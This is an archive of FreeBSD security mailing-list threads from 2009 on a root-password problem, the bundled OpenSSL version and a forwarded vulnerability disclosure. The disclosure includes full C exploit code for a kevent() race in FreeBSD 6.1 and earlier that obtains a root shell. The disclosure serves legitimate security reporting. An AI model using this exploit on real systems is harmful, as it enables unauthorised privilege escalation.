From davej at wsnet.co.za Tue Aug 11 16:31:50 2009 From: davej at wsnet.co.za (Dave Johnson) Date: Tue Aug 11 16:31:57 2009 Subject: Changing root password Message-ID: <1250005118.7479.29.camel@linux-sw0o.site> Hi all I need some assistance Op system : FreeBsd 7.2 with kernel update done in January 2009 Trying to log into root but getting wrong password. I rebooted machine and logged in as a single user and got the following message when I tried to change the password Passwd: Pam Chauthtok () error in service module Thanks for any help From majs at joworld.net Tue Aug 11 17:04:56 2009 From: majs at joworld.net (=?iso-8859-1?Q?J=E9r=F4me_Le_Gal?=) Date: Tue Aug 11 17:06:40 2009 Subject: Changing root password In-Reply-To: <1250005118.7479.29.camel@linux-sw0o.site> References: <1250005118.7479.29.camel@linux-sw0o.site> Message-ID: <9469CD8A99B94714A87A425B9CB73831@nb03> Hi, It's normal, your file system is mounted in RO. Try : mount -a -t ufs -----Message d'origine----- De?: owner-freebsd-security@freebsd.org [mailto:owner-freebsd-security@freebsd.org] De la part de Dave Johnson Envoy??: mardi 11 ao?t 2009 17:39 ??: freebsd-security@freebsd.org Objet?: Changing root password Hi all I need some assistance Op system : FreeBsd 7.2 with kernel update done in January 2009 Trying to log into root but getting wrong password. I rebooted machine and logged in as a single user and got the following message when I tried to change the password Passwd: Pam Chauthtok () error in service module Thanks for any help _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" From jerome at joworld.net Tue Aug 11 17:16:26 2009 From: jerome at joworld.net (=?iso-8859-1?Q?J=E9r=F4me_Le_Gal?=) Date: Tue Aug 11 17:16:33 2009 Subject: Changing root password In-Reply-To: <1250005118.7479.29.camel@linux-sw0o.site> References: <1250005118.7479.29.camel@linux-sw0o.site> Message-ID: Hi, It's normal, your file system is mounted in RO. Try to mount it in RW, for example : mount -a -t ufs -----Message d'origine----- De?: owner-freebsd-security@freebsd.org [mailto:owner-freebsd-security@freebsd.org] De la part de Dave Johnson Envoy??: mardi 11 ao?t 2009 17:39 ??: freebsd-security@freebsd.org Objet?: Changing root password Hi all I need some assistance Op system : FreeBsd 7.2 with kernel update done in January 2009 Trying to log into root but getting wrong password. I rebooted machine and logged in as a single user and got the following message when I tried to change the password Passwd: Pam Chauthtok () error in service module Thanks for any help _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" From lxn.smth at gmail.com Mon Aug 24 18:25:32 2009 From: lxn.smth at gmail.com (lxn smth) Date: Mon Aug 24 21:07:12 2009 Subject: FreeBSD <= 6.1 kqueue() NULL pointer dereference In-Reply-To: <4A90258F.6090606@freebsd.lublin.pl> References: <4A90258F.6090606@freebsd.lublin.pl> Message-ID: <864f75cb0908241101o309219d5x58261bb746eccb78@mail.gmail.com> FYI. 2009/8/22 Przemyslaw Frasunek : > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > FreeBSD <= 6.1 suffers from classical check/use race condition on SMP > systems in kevent() syscall, leading to kernel mode NULL pointer > dereference. It can be triggered by spawning two threads: > 1st thread looping on open() and close() syscalls, and the 2nd thread > looping on kevent(), trying to add possibly invalid filedescriptor. > > The bug was fixed in 6.1-STABLE, just before release of 6.2-RELEASE, but > was not recognized as security vulnerability. > > The following code exploits this vulnerability to run root shell. > > /* 22.08.2009, babcia padlina > ~ * FreeBSD kevent() race condition exploit > ~ * > ~ * works only on multiprocessor systems > ~ * gcc -o padlina padlina.c -lpthread > ~ * > ~ * with thanks to Pawel Pisarczyk for in-depth ia-32 architecture > discussion > ~ */ > > #define _KERNEL > > #include > #include > #include > #include > #include > #include > #include > #include > #include > #include > > #include > #include > #include > #include > > int fd; > int kq; > struct kevent kev, ke[10]; > struct timespec timeout; > int gotroot = 0; > > static void kernel_code(void) { > ~ ? ? ? ?struct thread *thread; > ~ ? ? ? ?gotroot = 1; > ~ ? ? ? ?asm( > ~ ? ? ? ? ? ? ? ?"pushl %%eax;" > ~ ? ? ? ? ? ? ? ?"movl %%fs:0, %0" > ~ ? ? ? ? ? ? ? ?: "=r"(thread) > ~ ? ? ? ?); > ~ ? ? ? ?thread->td_proc->p_ucred->cr_uid = 0; > ~ ? ? ? ?asm("popl %eax"); > ~ ? ? ? ?return; > } > > void do_thread(void) { > ~ ? ? ? ?sleep(1); > > ~ ? ? ? ?while (!gotroot) { > ~ ? ? ? ? ? ? ? ?memset(&kev, 0, sizeof(kev)); > ~ ? ? ? ? ? ? ? ?EV_SET(&kev, fd, EVFILT_VNODE, EV_ADD, 0, 0, NULL); > > ~ ? ? ? ? ? ? ? ?if (kevent(kq, &kev, 1, &ke, sizeof(ke), &timeout) < 0) { > ~ ? ? ? ? ? ? ? ? ? ? ? ?perror("kevent"); > ~ ? ? ? ? ? ? ? ?} > ~ ? ? ? ?} > > } > > void do_thread2(void) { > ~ ? ? ? ?while(!gotroot) { > ~ ? ? ? ? ? ? ? ?if ((fd = open("/tmp/.padlina", O_RDWR | O_CREAT, 0600)) < > 0) > ~ ? ? ? ? ? ? ? ? ? ? ? ?perror("open"); > > ~ ? ? ? ? ? ? ? ?close(fd); > ~ ? ? ? ?} > } > > int main(void) { > ~ ? ? ? ?pthread_t pth, pth2; > ~ ? ? ? ?long *ap; > ~ ? ? ? ?unsigned char *p, *sp; > > ~ ? ? ? ?if (mmap(0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | > MAP_FIXED, -1, 0) < 0) { > ~ ? ? ? ? ? ? ? ?perror("mmap"); > ~ ? ? ? ? ? ? ? ?return -1; > ~ ? ? ? ?} > > ~ ? ? ? ?memset(0x0, 0xc3, 0x1000); > > ~ ? ? ? ?for (p = 0, sp = &kernel_code; *sp != 0xc3;) > ~ ? ? ? ? ? ? ? ? ? ? ? ?*p++ = *sp++; > > ~ ? ? ? ?if ((kq = kqueue()) < 0) { > ~ ? ? ? ? ? ? ? ?perror("kqueue"); > ~ ? ? ? ? ? ? ? ?return -1; > ~ ? ? ? ?} > > ~ ? ? ? ?pthread_create(&pth, NULL, do_thread, NULL); > ~ ? ? ? ?pthread_create(&pth2, NULL, do_thread2, NULL); > > ~ ? ? ? ?timeout.tv_sec = 0; > ~ ? ? ? ?timeout.tv_nsec = 1; > > ~ ? ? ? ?while (!gotroot) > ~ ? ? ? ? ? ? ? ?usleep(100); > > ~ ? ? ? ?setuid(0); > ~ ? ? ? ?execl("/bin/sh", "sh", 0); > > ~ ? ? ? ?printf("exploit failed\n"); > ~ ? ? ? ?return 0; > } > > > - -- > * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE * > * JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV * > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iEYEARECAAYFAkqQJY8ACgkQkxEnBiV4/K1IRACeI/GYTKhzGqPJLkpheDV8rEIl > yFMAnAo6czNexms9f4zMwUjzAioNRtqz > =8qMi > -----END PGP SIGNATURE----- > From c.kworr at gmail.com Thu Aug 27 12:12:46 2009 From: c.kworr at gmail.com (Volodymyr Kostyrko) Date: Thu Aug 27 12:52:15 2009 Subject: bundled openssl version Message-ID: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> I'm just puzzled why we still stick to 0.9.8e. It's almost ancient. Why not 0.9.8f? Doesn't someone need TLS extensions working? -- Sphinx of black quartz judge my vow. From jerome at joworld.net Thu Aug 27 12:58:12 2009 From: jerome at joworld.net (=?iso-8859-1?Q?J=E9r=F4me_Le_Gal?=) Date: Thu Aug 27 12:58:19 2009 Subject: bundled openssl version In-Reply-To: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> Message-ID: Hi, Why don't you use security/openssl ? -----Message d'origine----- De?: owner-freebsd-security@freebsd.org [mailto:owner-freebsd-security@freebsd.org] De la part de Volodymyr Kostyrko Envoy??: jeudi 27 ao?t 2009 13:52 ??: freebsd-security@freebsd.org Objet?: bundled openssl version I'm just puzzled why we still stick to 0.9.8e. It's almost ancient. Why not 0.9.8f? Doesn't someone need TLS extensions working? -- Sphinx of black quartz judge my vow. _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" From Gabor at Zahemszky.HU Thu Aug 27 18:03:17 2009 From: Gabor at Zahemszky.HU (Zahemszky =?ISO-8859-2?Q?G=E1bor?=) Date: Thu Aug 27 18:03:24 2009 Subject: bundled openssl version In-Reply-To: References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> Message-ID: <20090827192946.7f5782c3@Picasso.Zahemszky.HU> >> I'm just puzzled why we still stick to 0.9.8e. It's almost ancient. >> Why not 0.9.8f? Doesn't someone need TLS extensions working? > Why don't you use security/openssl ? Why do we need a port, if we can / could use the program from the base system? Zahy < Gabor at Zahemszky dot HU > -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!'; IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ '; set -- $Z;for i;{ [[ $i = ? ]]&&print $i&&break; [[ $i = ??? ]]&&j=$i&&i=${i%?}; typeset -i40 i=8#$i;print -n ${i#???}; [[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;}; IFS=' 0123456789 ';set -- $Z;for i;{ [[ $i = , ]]&&i=2; [[ $i = ?? ]]||typeset -l i;j="$j $i";typeset +l i;};print "$j" From leccine at gmail.com Fri Aug 28 07:23:23 2009 From: leccine at gmail.com (=?ISO-8859-1?B?SXN0duFu?=) Date: Fri Aug 28 07:26:01 2009 Subject: bundled openssl version In-Reply-To: <20090827192946.7f5782c3@Picasso.Zahemszky.HU> References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> <20090827192946.7f5782c3@Picasso.Zahemszky.HU> Message-ID: custom flags -O666 and so on:) On Thu, Aug 27, 2009 at 6:29 PM, Zahemszky G?bor wrote: > >> I'm just puzzled why we still stick to 0.9.8e. It's almost ancient. > >> Why not 0.9.8f? Doesn't someone need TLS extensions working? > > > Why don't you use security/openssl ? > > Why do we need a port, if we can / could use the program from the base > system? > > Zahy < Gabor at Zahemszky dot HU > > > -- > #!/bin/ksh > Z='21N16I25C25E30, 40M30E33E25T15U!'; > IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ '; > set -- $Z;for i;{ [[ $i = ? ]]&&print $i&&break; > [[ $i = ??? ]]&&j=$i&&i=${i%?}; > typeset -i40 i=8#$i;print -n ${i#???}; > [[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;}; > IFS=' 0123456789 ';set -- $Z;for i;{ [[ $i = , ]]&&i=2; > [[ $i = ?? ]]||typeset -l i;j="$j $i";typeset +l i;};print "$j" > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org > " > -- the sun shines for all